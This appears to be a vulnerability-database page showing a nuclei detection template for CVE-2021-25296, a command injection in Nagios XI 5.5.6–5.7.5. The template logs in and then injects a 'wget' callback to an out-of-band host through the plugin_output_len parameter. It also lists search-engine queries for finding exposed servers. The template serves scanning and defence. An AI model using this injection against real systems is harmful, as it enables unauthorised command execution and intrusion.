Lucene search
K

Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection

🗓️ 30 Jun 2026 04:56:11Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 41 Views

Nagios XI version 5.5.6-5.7.5 remote command injection vulnerability in windowswmi.inc.ph

Related
Refs
Code
id: CVE-2021-25296

info:
  name: Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection
  author: k0pak4
  severity: high
  description: |
    Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  impact: |
    Successful exploitation of this vulnerability allows authenticated attackers to execute arbitrary commands on the target system.
  remediation: |
    Upgrade Nagios XI to a patched version or apply the vendor-supplied patch to mitigate this vulnerability.
  reference:
    - https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md
    - https://github.com/rapid7/metasploit-framework/pull/17494
    - http://nagios.com
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25296
    - http://packetstormsecurity.com/files/170924/Nagios-XI-5.7.5-Remote-Code-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2021-25296
    cwe-id: CWE-78
    epss-score: 0.71737
    epss-percentile: 0.99345
    cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: nagios
    product: nagios_xi
    shodan-query:
      - title:"Nagios XI"
      - http.title:"nagios xi"
    fofa-query:
      - title="nagios xi"
      - app="nagios-xi"
    google-query: intitle:"nagios xi"
  tags: cve,cve2021,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios,vkev,vuln

http:
  - raw:
      - |
        GET /nagiosxi/login.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /nagiosxi/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        nsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}
      - |
        GET /nagiosxi/index.php HTTP/1.1
        Host: {{Hostname}}
      - |
        @timeout: 20s
        GET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&ip_address=127.0.0.1&domain=127.0.0.1&username=username&password=password&plugin_output_len=9999%3bwget%20{{interactsh-url}}%3b HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

      - type: word
        part: body_4
        words:
          - "Event Log"
          - "Display Name"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: nsp
        group: 1
        regex:
          - "name=['\"]nsp['\"] value=['\"](.*)['\"]>"
        internal: true
        part: body

      - type: regex
        name: nsp_auth
        group: 1
        regex:
          - "var nsp_str = ['\"](.*)['\"];"
        internal: true
        part: body
# digest: 4a0a00473045022100e8073c287710ec737416c3f2e92d609a19b726c3dba5f821639301f0de96f5130220165a94a782d12acd508d2bcc4ac0028f44a8674d882370584f3471a216e79846:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 3.18.8
CVSS 29
EPSS0.71737
SSVC
41